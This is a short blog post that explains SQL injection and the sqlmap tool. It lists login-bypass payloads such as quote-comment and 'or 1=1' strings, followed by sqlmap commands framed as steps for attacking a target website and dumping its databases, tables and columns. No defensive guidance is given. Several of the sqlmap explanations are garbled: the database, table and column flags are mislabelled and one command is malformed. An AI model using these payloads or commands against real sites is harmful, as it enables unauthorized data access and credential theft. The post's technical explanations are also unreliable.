What's New

What is SQL Injection & How to use SQL Map

By siddhant on June 05, 2019
SQL Injection is a type of an attack which is done on the websites to excess their sensitive data without any authority by adding any malicious content into the website called payload. By the SQL injection vulnerability, an attacker can bypass the login credential by putting some SQL cheat codes in it and can access all the data of the websites and the credentials of all the user of the website.
SQL Injection can also be used to add, modify and delete records in a database, affecting data integrity.
Related image 
How SQL Injection can be done?

It can be done in two ways:

1. By using SQL cheat codes

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

 2. By using SQL map

SQL map is  the tool in Kali Linux from which we can attack the website by using some commands like:
sqlmap -u (link of the website on which you want to attack) --DBS
       By this command you will enter in the database of the website
sqlmap -u (link of the website on which you want to attack) -D (table name) --tables 
       This command will help you to enter in a specific table.
sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name) --columns

This command will help you to enter in the specific column of the specific table.
sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name-C (specific column) --dump

By this command you will get into the database of the website.

No comments

Check out our Handpicked Products and Avail Great Discounts Now

We choose products from Amazon which provide great value and update the list daily.